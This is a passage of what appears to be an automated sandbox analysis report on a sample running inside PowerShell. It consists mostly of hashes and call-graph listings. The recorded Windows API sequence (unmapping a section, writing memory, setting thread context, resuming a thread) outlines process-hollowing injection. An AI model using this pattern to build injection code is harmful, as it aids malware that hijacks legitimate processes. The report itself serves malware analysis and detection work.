                                                        • Opcode Fuzzy Hash: 866f889c558d675e83477d6203bfdabd72d7f9d43e900279403a965f474cab53
                                                        • Instruction Fuzzy Hash: 77C09270FC13009AFF1A2FB0DD0DA1A3ED89E68B0338408D2B205F20E4EE64C40CD520

                                                        Execution Graph

                                                        Execution Coverage:7.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:44.4%
                                                        Total number of Nodes:27
                                                        Total number of Limit Nodes:0

                                                        Executed Functions

                                                        Function 00007FFD9B7F0C4D Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 377 7ffd9b7f0c4d-7ffd9b7f0c59 378 7ffd9b7f0c5b-7ffd9b7f0c63 377->378 379 7ffd9b7f0c64-7ffd9b7f0cd8 377->379 378->379 383 7ffd9b7f0cda-7ffd9b7f0cdf 379->383 384 7ffd9b7f0ce2-7ffd9b7f0d25 NtWriteVirtualMemory 379->384 383->384 385 7ffd9b7f0d27 384->385 386 7ffd9b7f0d2d-7ffd9b7f0d4a 384->386 385->386
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3527976591-0
                                                        • Opcode ID: 7f7e9a2abca5b76a5701a82e9025d6660e9e83a65a10e9592c594c3fa0f738ad
                                                        • Instruction ID: 852bc6d63eae524ba9efdaed389421539da00224822b300e8f622d591dcf265e
                                                        • Opcode Fuzzy Hash: 7f7e9a2abca5b76a5701a82e9025d6660e9e83a65a10e9592c594c3fa0f738ad
                                                        • Instruction Fuzzy Hash: C431B331A0CB4C8FDB18DF58D885AE9BBE0FB59711F04426ED059D3692CB70A846CB85
                                                        Function 00007FFD9B7F0FD4 Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 402 7ffd9b7f0fd4-7ffd9b7f0fdb 403 7ffd9b7f0fe6-7ffd9b7f1092 NtResumeThread 402->403 404 7ffd9b7f0fdd-7ffd9b7f0fe5 402->404 408 7ffd9b7f109a-7ffd9b7f10b6 403->408 409 7ffd9b7f1094 403->409 404->403 409->408
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 92bfed4054fa27ef5f6274612569d5f0a4c861a153082e1e44fb9e5afac811e3
                                                        • Instruction ID: 9c2f7d1317a029e25b3ad85b060b90eb59cbfc9cbb19afa91d479e9d58dcce52
                                                        • Opcode Fuzzy Hash: 92bfed4054fa27ef5f6274612569d5f0a4c861a153082e1e44fb9e5afac811e3
                                                        • Instruction Fuzzy Hash: 2831D331A0C64C8FDB58DFA8D845BEDBBE1EF56320F04426BD059D3292CB74A846CB91
                                                        Function 00007FFD9B7F0A2E Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 395 7ffd9b7f0a2e-7ffd9b7f0a3b 396 7ffd9b7f0a46-7ffd9b7f0af8 NtUnmapViewOfSection 395->396 397 7ffd9b7f0a3d-7ffd9b7f0a45 395->397 400 7ffd9b7f0afa 396->400 401 7ffd9b7f0b00-7ffd9b7f0b1c 396->401 397->396 400->401
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: b11e35f54595c5c8f542c23d6916185117eb706ea8d953628cc4cddc2721e18e
                                                        • Instruction ID: fe72e7335dce88b5025489f02ca336fb1dbce004e85da269f5ed4253d02cd182
                                                        • Opcode Fuzzy Hash: b11e35f54595c5c8f542c23d6916185117eb706ea8d953628cc4cddc2721e18e
                                                        • Instruction Fuzzy Hash: 4E31F630A0C6888FDB59DF68C855BE97FF0EF56320F08429FD049C72A7D664A446CB92
                                                        Function 00007FFD9B7F0F10 Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 410 7ffd9b7f0f10-7ffd9b7f0fa8 NtSetContextThread 414 7ffd9b7f0faa 410->414 415 7ffd9b7f0fb0-7ffd9b7f0fcc 410->415 414->415
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThread
                                                        • String ID:
                                                        • API String ID: 1591575202-0
                                                        • Opcode ID: 0d531f4c7956a762bee5dfe99da4d2d1b2d29844d51c5e75a093fec336e9a9b7
                                                        • Instruction ID: f971b4db0f2fe464e28b8880571d3cfa44a450df3d1965a8ca4abdf58f33bd38
                                                        • Opcode Fuzzy Hash: 0d531f4c7956a762bee5dfe99da4d2d1b2d29844d51c5e75a093fec336e9a9b7
                                                        • Instruction Fuzzy Hash: DE21B131A0CB4C8FDB58DF98D886BE97BF0EB96320F04416FD049C3252CA74A846CB91
                                                        Function 00007FFD9B7F0211 Relevance: 2.4, APIs: 1, Instructions: 888processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 280 7ffd9b7f0211-7ffd9b7f021d 281 7ffd9b7f0228-7ffd9b7f0249 280->281 282 7ffd9b7f021f-7ffd9b7f0227 280->282 283 7ffd9b7f024b-7ffd9b7f028c 281->283 284 7ffd9b7f028d-7ffd9b7f06e2 281->284 282->281 283->284 290 7ffd9b7f06e4-7ffd9b7f06f3 284->290 291 7ffd9b7f0740-7ffd9b7f0772 284->291 290->291 292 7ffd9b7f06f5-7ffd9b7f06f8 290->292 296 7ffd9b7f0774-7ffd9b7f0783 291->296 297 7ffd9b7f07d0-7ffd9b7f0821 291->297 294 7ffd9b7f06fa-7ffd9b7f070d 292->294 295 7ffd9b7f0732-7ffd9b7f073a 292->295 298 7ffd9b7f0711-7ffd9b7f0724 294->298 299 7ffd9b7f070f 294->299 295->291 296->297 300 7ffd9b7f0785-7ffd9b7f0788 296->300 307 7ffd9b7f0823-7ffd9b7f0832 297->307 308 7ffd9b7f087f-7ffd9b7f08b0 297->308 298->298 301 7ffd9b7f0726-7ffd9b7f072e 298->301 299->298 302 7ffd9b7f078a-7ffd9b7f079d 300->302 303 7ffd9b7f07c2-7ffd9b7f07ca 300->303 301->295 305 7ffd9b7f07a1-7ffd9b7f07b4 302->305 306 7ffd9b7f079f 302->306 303->297 305->305 309 7ffd9b7f07b6-7ffd9b7f07be 305->309 306->305 307->308 310 7ffd9b7f0834-7ffd9b7f0837 307->310 316 7ffd9b7f08b2-7ffd9b7f08ba 308->316 317 7ffd9b7f08be-7ffd9b7f093e CreateProcessA 308->317 309->303 311 7ffd9b7f0839-7ffd9b7f084c 310->311 312 7ffd9b7f0871-7ffd9b7f0879 310->312 314 7ffd9b7f0850-7ffd9b7f0863 311->314 315 7ffd9b7f084e 311->315 312->308 314->314 318 7ffd9b7f0865-7ffd9b7f086d 314->318 315->314 316->317 319 7ffd9b7f0946-7ffd9b7f0983 call 7ffd9b7f099f 317->319 320 7ffd9b7f0940 317->320 318->312 323 7ffd9b7f098a-7ffd9b7f099e 319->323 324 7ffd9b7f0985 319->324 320->319 324->323
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 35970d58cde7fab5887ffc7b0f35bbc9b55bfa8eba718646a4097a295dcd37f8
                                                        • Instruction ID: 9274fc603f5511586327b0fc72cde6dae9cb650442ad05c8cd8ada9b15e41af8
                                                        • Opcode Fuzzy Hash: 35970d58cde7fab5887ffc7b0f35bbc9b55bfa8eba718646a4097a295dcd37f8
                                                        • Instruction Fuzzy Hash: 44D11330619B8D4FEB64DF28CC567E57BE0FF55310F0542AAD88DC72A2DA34A9458BC2
                                                        Function 00007FFD9B7EEAEA Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 325 7ffd9b7eeaea-7ffd9b7eeaf7 326 7ffd9b7eeaf9-7ffd9b7eeb01 325->326 327 7ffd9b7eeb02-7ffd9b7eebcf 325->327 326->327 330 7ffd9b7eec2a-7ffd9b7eeca7 CreateFileMappingW 327->330 331 7ffd9b7eebd1-7ffd9b7eebe0 327->331 336 7ffd9b7eeca9 330->336 337 7ffd9b7eecaf-7ffd9b7eeceb call 7ffd9b7eed07 330->337 331->330 332 7ffd9b7eebe2-7ffd9b7eebe5 331->332 333 7ffd9b7eebe7-7ffd9b7eebfa 332->333 334 7ffd9b7eec1f-7ffd9b7eec27 332->334 338 7ffd9b7eebfc 333->338 339 7ffd9b7eebfe-7ffd9b7eec11 333->339 334->330 336->337 344 7ffd9b7eecf2-7ffd9b7eed06 337->344 345 7ffd9b7eeced 337->345 338->339 339->339 340 7ffd9b7eec13-7ffd9b7eec1b 339->340 340->334 345->344
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFileMapping
                                                        • String ID:
                                                        • API String ID: 524692379-0
                                                        • Opcode ID: 8c3dac3b35d228fc4cbd1ae7fc24a1ed6cbeb155b459b81a96ea458c56a2184f
                                                        • Instruction ID: 58c6497b259cc7a9975cde2ffd953a27fa3ecb0bbda94825e9558a1d5080efb3
                                                        • Opcode Fuzzy Hash: 8c3dac3b35d228fc4cbd1ae7fc24a1ed6cbeb155b459b81a96ea458c56a2184f
                                                        • Instruction Fuzzy Hash: 5A71C630608B8D4FDB59DF28CC567E57BE1FF59310F1442AAE84DC72A2DA74A8418B82
                                                        Function 00007FFD9B7EE89C Relevance: 1.7, APIs: 1, Instructions: 229fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 346 7ffd9b7ee89c-7ffd9b7ee8a3 347 7ffd9b7ee8a5-7ffd9b7ee8ad 346->347 348 7ffd9b7ee8ae-7ffd9b7ee947 346->348 347->348 352 7ffd9b7ee949-7ffd9b7ee958 348->352 353 7ffd9b7ee9a2-7ffd9b7eea3a CreateFileA 348->353 352->353 354 7ffd9b7ee95a-7ffd9b7ee95d 352->354 360 7ffd9b7eea3c 353->360 361 7ffd9b7eea42-7ffd9b7eea7e call 7ffd9b7eea9a 353->361 356 7ffd9b7ee997-7ffd9b7ee99f 354->356 357 7ffd9b7ee95f-7ffd9b7ee972 354->357 356->353 358 7ffd9b7ee976-7ffd9b7ee989 357->358 359 7ffd9b7ee974 357->359 358->358 362 7ffd9b7ee98b-7ffd9b7ee993 358->362 359->358 360->361 366 7ffd9b7eea85-7ffd9b7eea99 361->366 367 7ffd9b7eea80 361->367 362->356 367->366
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: ee23417063d29568cafc0c393e03b27ac88f4ca5b36de8fed21c76b6e9bc7a31
                                                        • Instruction ID: d4c6747042a44426802703746c1b2db22b6399a551ef93dd30e8b075eecf7ad3
                                                        • Opcode Fuzzy Hash: ee23417063d29568cafc0c393e03b27ac88f4ca5b36de8fed21c76b6e9bc7a31
                                                        • Instruction Fuzzy Hash: 6B61D830518B8D4FDBA8DF18D8567E477E1FF59310F14426AE84DC32A2CA74E9418B82
                                                        Function 00007FFD9B7EED56 Relevance: 1.6, APIs: 1, Instructions: 134fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 368 7ffd9b7eed56-7ffd9b7eed63 369 7ffd9b7eed65-7ffd9b7eed6d 368->369 370 7ffd9b7eed6e-7ffd9b7eed7f 368->370 369->370 371 7ffd9b7eed8a-7ffd9b7eee41 MapViewOfFile 370->371 372 7ffd9b7eed81-7ffd9b7eed89 370->372 375 7ffd9b7eee49-7ffd9b7eee66 371->375 376 7ffd9b7eee43 371->376 372->371 376->375
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: FileView
                                                        • String ID:
                                                        • API String ID: 3314676101-0
                                                        • Opcode ID: 6e8182d5656318a8b4e7d8b32e3925e6e5a6e943fcb1f9eb17b99c9cd7bde471
                                                        • Instruction ID: f35db250139db4b593d20634d1240a0848266be09745e11acd9ae4b49da8860b
                                                        • Opcode Fuzzy Hash: 6e8182d5656318a8b4e7d8b32e3925e6e5a6e943fcb1f9eb17b99c9cd7bde471
                                                        • Instruction Fuzzy Hash: 7741293090CA889FD71DDB68D8066F97BF0FF5A321F14026ED099D31A2CB647446CB91
                                                        Function 00007FFD9B7EE798 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 387 7ffd9b7ee798-7ffd9b7ee79f 388 7ffd9b7ee7aa-7ffd9b7ee860 K32GetModuleInformation 387->388 389 7ffd9b7ee7a1-7ffd9b7ee7a9 387->389 392 7ffd9b7ee868-7ffd9b7ee897 388->392 393 7ffd9b7ee862 388->393 389->388 393->392
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: ca442ac7187ea045a3a16433112d119e7f63fdcfb517ba607ad182beab6ecbd1
                                                        • Instruction ID: ca9f31a977f7b3087036573d3e50eff16d8304ec37e736bedc5b0c01ac2dfe1d
                                                        • Opcode Fuzzy Hash: ca442ac7187ea045a3a16433112d119e7f63fdcfb517ba607ad182beab6ecbd1
                                                        • Instruction Fuzzy Hash: E831C831E0CA4C4FDB18DB9898496F97BE1EF56321F04427FD059D3292CB756846C791
                                                        Function 00007FFD9B8B26C1 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1948550592.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8b09bce70f6f3a808cb63f153217fc958925d5ef18f565a95e98e9ce3252f04
                                                        • Instruction ID: cf3908a00da70dd7f19dc53f1cb266b743226b23d4f93612e92fa861e05b304a
                                                        • Opcode Fuzzy Hash: a8b09bce70f6f3a808cb63f153217fc958925d5ef18f565a95e98e9ce3252f04
                                                        • Instruction Fuzzy Hash: E521D853E0FADE0FE7A1ABB868741646EC19F5A290B1901FEC06CC71E7E8086C054B51

                                                        Execution Graph

                                                        Execution Coverage:5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:12%
                                                        Total number of Nodes:1249
                                                        Total number of Limit Nodes:27
                                                        execution_graph 8038 2e86a092a74 8040 2e86a092ac8 8038->8040 8039 2e86a092ae3 8040->8039 8042 2e86a0933f8 8040->8042 8043 2e86a093490 8042->8043 8046 2e86a09341d 8042->8046 8043->8039 8044 2e86a093c70 StrCmpNIW 8044->8046 8045 2e86a091d08 StrCmpIW StrCmpW 8045->8046 8046->8043 8046->8044 8046->8045 8047 2e86a09ae74 8048 2e86a09ae7c 8047->8048 8050 2e86a09aead 8048->8050 8051 2e86a09aea9 8048->8051 8053 2e86a09d77c 8048->8053 8058 2e86a09aed8 8050->8058 8054 2e86a09d3ec try_get_function 5 API calls 8053->8054 8055 2e86a09d7b2 8054->8055 8056 2e86a09d7c7 InitializeCriticalSectionAndSpinCount 8055->8056 8057 2e86a09d7bc 8055->8057 8056->8057 8057->8048 8059 2e86a09af03 8058->8059 8060 2e86a09aee6 DeleteCriticalSection 8059->8060 8061 2e86a09af07 8059->8061 8060->8059 8061->8051 8789 2e86a098376 8790 2e86a099538 __std_exception_copy 30 API calls 8789->8790 8791 2e86a0983a1 8790->8791 8496 2e86a0928e8 8498 2e86a09292d 8496->8498 8497 2e86a092990 8498->8497 8499 2e86a093c70 StrCmpNIW 8498->8499 8499->8498 8500 2e86a09e2e8 8501 2e86a09e312 8500->8501 8502 2e86a09b980 _set_errno_from_matherr 13 API calls 8501->8502 8503 2e86a09e331 8502->8503 8504 2e86a09b9f8 __free_lconv_num 13 API calls 8503->8504 8505 2e86a09e33f 8504->8505 8506 2e86a09b980 _set_errno_from_matherr 13 API calls 8505->8506 8509 2e86a09e369 8505->8509 8508 2e86a09e35b 8506->8508 8507 2e86a09d77c 6 API calls 8507->8509 8510 2e86a09b9f8 __free_lconv_num 13 API calls 8508->8510 8509->8507 8511 2e86a09e372 8509->8511 8510->8509 8792 2e86a09596d 8794 2e86a095974 8792->8794 8793 2e86a0959db 8794->8793 8795 2e86a095a57 VirtualProtect 8794->8795 8796 2e86a095a91 8795->8796 8797 2e86a095a83 GetLastError 8795->8797 8797->8796 7353 2e86a094000 7356 2e86a093f4d _invalid_parameter_noinfo 7353->7356 7354 2e86a093fb7 7355 2e86a093f9d VirtualQuery 7355->7354 7355->7356 7356->7354 7356->7355 7357 2e86a094002 GetLastError 7356->7357 7357->7356 8798 2e86a092b84 8800 2e86a092be1 8798->8800 8799 2e86a092bfc 8800->8799 8801 2e86a0934ac 3 API calls 8800->8801 8801->8799 7358 2e86a09f004 7359 2e86a09f023 7358->7359 7360 2e86a09f09c 7359->7360 7363 2e86a09f033 7359->7363 7375 2e86a098620 7360->7375 7366 2e86a097d60 7363->7366 7367 2e86a097d69 7366->7367 7368 2e86a097d74 7367->7368 7369 2e86a09854c IsProcessorFeaturePresent 7367->7369 7370 2e86a098564 7369->7370 7378 2e86a098740 RtlCaptureContext 7370->7378 7383 2e86a098634 IsProcessorFeaturePresent 7375->7383 7379 2e86a09875a RtlLookupFunctionEntry 7378->7379 7380 2e86a098770 RtlVirtualUnwind 7379->7380 7381 2e86a098577 7379->7381 7380->7379 7380->7381 7382 2e86a098518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7381->7382 7384 2e86a09864b 7383->7384 7389 2e86a0986d0 RtlCaptureContext RtlLookupFunctionEntry 7384->7389 7390 2e86a098700 RtlVirtualUnwind 7389->7390 7391 2e86a09865f 7389->7391 7390->7391 7392 2e86a098518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7391->7392 8512 2e86a09ab04 8513 2e86a09ab1d 8512->8513 8515 2e86a09ab35 8512->8515 8514 2e86a09b9f8 __free_lconv_num 13 API calls 8513->8514 8513->8515 8514->8515 8802 2e86a09b184 8803 2e86a09b19e 8802->8803 8804 2e86a09b189 8802->8804 8808 2e86a09b1a4 8804->8808 8809 2e86a09b1ee 8808->8809 8810 2e86a09b1e6 8808->8810 8811 2e86a09b9f8 __free_lconv_num 13 API calls 8809->8811 8812 2e86a09b9f8 __free_lconv_num 13 API calls 8810->8812 8813 2e86a09b1fb 8811->8813 8812->8809 8814 2e86a09b9f8 __free_lconv_num 13 API calls 8813->8814 8815 2e86a09b208 8814->8815 8816 2e86a09b9f8 __free_lconv_num 13 API calls 8815->8816 8817 2e86a09b215 8816->8817 8818 2e86a09b9f8 __free_lconv_num 13 API calls 8817->8818 8819 2e86a09b222 8818->8819 8820 2e86a09b9f8 __free_lconv_num 13 API calls 8819->8820 8821 2e86a09b22f 8820->8821 8822 2e86a09b9f8 __free_lconv_num 13 API calls 8821->8822 8823 2e86a09b23c 8822->8823 8824 2e86a09b9f8 __free_lconv_num 13 API calls 8823->8824 8825 2e86a09b249 8824->8825 8826 2e86a09b9f8 __free_lconv_num 13 API calls 8825->8826 8827 2e86a09b259 8826->8827 8828 2e86a09b9f8 __free_lconv_num 13 API calls 8827->8828 8829 2e86a09b269 8828->8829 8834 2e86a09b054 8829->8834 8848 2e86a09aebc EnterCriticalSection 8834->8848 8850 2e86a09d984 GetProcessHeap 8062 2e86a09f478 8063 2e86a09f480 8062->8063 8064 2e86a09f495 8063->8064 8067 2e86a09f4ae 8063->8067 8065 2e86a09b960 _set_errno_from_matherr 13 API calls 8064->8065 8066 2e86a09f49a 8065->8066 8068 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8066->8068 8069 2e86a09ad0c 33 API calls 8067->8069 8070 2e86a09f4a5 8067->8070 8068->8070 8069->8070 7266 1400036fc 7267 140003709 7266->7267 7268 1400022fc 6 API calls 7267->7268 7269 140003729 ConnectNamedPipe 7267->7269 7270 14000371e Sleep 7267->7270 7268->7267 7271 140003787 Sleep 7269->7271 7272 140003738 ReadFile 7269->7272 7270->7267 7273 140003792 DisconnectNamedPipe 7271->7273 7272->7273 7274 14000375b 7272->7274 7273->7269 7276 140003198 31 API calls 7274->7276 7275 140003761 WriteFile 7275->7273 7276->7275 8525 2e86a097efc 8532 2e86a099470 8525->8532 8528 2e86a097f09 8533 2e86a099798 9 API calls 8532->8533 8534 2e86a097f05 8533->8534 8534->8528 8535 2e86a09abb4 8534->8535 8536 2e86a09b4c4 _set_errno_from_matherr 13 API calls 8535->8536 8537 2e86a097f12 8536->8537 8537->8528 8538 2e86a099484 8537->8538 8541 2e86a09972c 8538->8541 8540 2e86a09948f 8540->8528 8542 2e86a099740 8541->8542 8546 2e86a09975a __std_exception_copy 8541->8546 8543 2e86a099b10 __vcrt_freeptd 6 API calls 8542->8543 8545 2e86a09974a 8542->8545 8543->8545 8547 2e86a099b58 8545->8547 8546->8540 8548 2e86a099930 __vcrt_InitializeCriticalSectionEx 5 API calls 8547->8548 8549 2e86a099b86 8548->8549 8550 2e86a099b90 8549->8550 8551 2e86a099b98 TlsSetValue 8549->8551 8550->8546 8551->8550 8071 2e86a09e47c 8072 2e86a09e4a4 8071->8072 8078 2e86a09e4b2 8071->8078 8073 2e86a09ad0c 33 API calls 8072->8073 8072->8078 8074 2e86a09e4d0 8073->8074 8075 2e86a09e4de 8074->8075 8077 2e86a09e500 8074->8077 8087 2e86a0a0e04 8075->8087 8077->8078 8090 2e86a0a0db8 8077->8090 8081 2e86a09e596 8084 2e86a09d144 MultiByteToWideChar 8081->8084 8082 2e86a09e544 8083 2e86a09e579 8082->8083 8085 2e86a09d144 MultiByteToWideChar 8082->8085 8083->8078 8086 2e86a09b960 _set_errno_from_matherr 13 API calls 8083->8086 8084->8083 8085->8083 8086->8078 8093 2e86a0a14c4 8087->8093 8091 2e86a09ad0c 33 API calls 8090->8091 8092 2e86a09e540 8091->8092 8092->8081 8092->8082 8095 2e86a0a1521 8093->8095 8098 2e86a0a152d 8093->8098 8094 2e86a097d60 _handle_error 8 API calls 8097 2e86a0a0e17 8094->8097 8095->8094 8096 2e86a09b960 _set_errno_from_matherr 13 API calls 8096->8095 8097->8078 8098->8095 8098->8096 7393 2e86a092c10 7394 2e86a092c81 7393->7394 7395 2e86a092cb1 GetModuleHandleA 7394->7395 7399 2e86a092e87 7394->7399 7396 2e86a092cc3 GetProcAddress 7395->7396 7397 2e86a092cd5 7395->7397 7396->7397 7398 2e86a092cfc StrCmpNIW 7397->7398 7397->7399 7398->7399 7402 2e86a092d21 7398->7402 7400 2e86a091934 6 API calls 7400->7402 7401 2e86a092e34 lstrlenW 7401->7402 7402->7399 7402->7400 7402->7401 7405 2e86a091bf4 7402->7405 7409 2e86a093c70 7402->7409 7406 2e86a091c0b 7405->7406 7407 2e86a091c14 7405->7407 7412 2e86a09152c 7406->7412 7407->7402 7410 2e86a093c92 7409->7410 7411 2e86a093c7d StrCmpNIW 7409->7411 7410->7402 7411->7410 7413 2e86a09157c 7412->7413 7416 2e86a091546 7412->7416 7413->7407 7414 2e86a091565 StrCmpW 7414->7416 7415 2e86a09155d StrCmpIW 7415->7416 7416->7413 7416->7414 7416->7415 7417 2e86a099210 7418 2e86a099240 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 7417->7418 7419 2e86a099331 7418->7419 7420 2e86a0992fc RtlUnwindEx 7418->7420 7420->7418 8552 2e86a096110 8553 2e86a09611d 8552->8553 8554 2e86a096129 8553->8554 8559 2e86a09623a 8553->8559 8555 2e86a0961ad 8554->8555 8556 2e86a096186 SetThreadContext 8554->8556 8556->8555 8557 2e86a096261 VirtualProtect FlushInstructionCache 8557->8559 8558 2e86a09631e 8560 2e86a09633e 8558->8560 8562 2e86a094800 VirtualFree 8558->8562 8559->8557 8559->8558 8561 2e86a095210 3 API calls 8560->8561 8565 2e86a096343 8561->8565 8562->8560 8563 2e86a096397 8566 2e86a097d60 _handle_error 8 API calls 8563->8566 8564 2e86a096357 ResumeThread 8564->8565 8565->8563 8565->8564 8567 2e86a0963df 8566->8567 8568 2e86a09e710 8571 2e86a09e694 8568->8571 8578 2e86a09aebc EnterCriticalSection 8571->8578 8851 2e86a09b590 8858 2e86a09d650 8851->8858 8859 2e86a09d3ec try_get_function 5 API calls 8858->8859 8860 2e86a09d678 TlsAlloc 8859->8860 8862 2e86a09eb90 8863 2e86a09ebbd 8862->8863 8864 2e86a09b960 _set_errno_from_matherr 13 API calls 8863->8864 8869 2e86a09ebd2 8863->8869 8865 2e86a09ebc7 8864->8865 8866 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8865->8866 8866->8869 8867 2e86a097d60 _handle_error 8 API calls 8868 2e86a09ef1f 8867->8868 8869->8867 7421 2e86a092408 7423 2e86a092484 _invalid_parameter_noinfo 7421->7423 7422 2e86a0925c3 7423->7422 7424 2e86a0924ea GetFileType 7423->7424 7425 2e86a0924f8 StrCpyW 7424->7425 7426 2e86a09250c 7424->7426 7429 2e86a092519 7425->7429 7432 2e86a0919d8 GetFinalPathNameByHandleW 7426->7432 7428 2e86a093c70 StrCmpNIW 7428->7429 7429->7422 7429->7428 7437 2e86a09330c StrCmpIW 7429->7437 7441 2e86a091cd4 7429->7441 7433 2e86a091a41 7432->7433 7434 2e86a091a02 StrCmpNIW 7432->7434 7433->7429 7434->7433 7435 2e86a091a1c lstrlenW 7434->7435 7435->7433 7436 2e86a091a2e StrCpyW 7435->7436 7436->7433 7438 2e86a093355 PathCombineW 7437->7438 7439 2e86a09333e StrCpyW StrCatW 7437->7439 7440 2e86a09335e 7438->7440 7439->7440 7440->7429 7442 2e86a091ceb 7441->7442 7443 2e86a091cf4 7441->7443 7444 2e86a09152c 2 API calls 7442->7444 7443->7429 7444->7443 7445 2e86a09e408 7446 2e86a09e413 7445->7446 7454 2e86a0a0c64 7446->7454 7472 2e86a09aebc EnterCriticalSection 7454->7472 8099 2e86a09a688 8100 2e86a09a6a1 8099->8100 8101 2e86a09a69d 8099->8101 8102 2e86a09cd58 43 API calls 8100->8102 8103 2e86a09a6a6 8102->8103 8111 2e86a09d250 GetEnvironmentStringsW 8103->8111 8106 2e86a09a6b3 8108 2e86a09b9f8 __free_lconv_num 13 API calls 8106->8108 8108->8101 8110 2e86a09b9f8 __free_lconv_num 13 API calls 8110->8106 8112 2e86a09d320 8111->8112 8113 2e86a09d27e 8111->8113 8114 2e86a09a6ab 8112->8114 8115 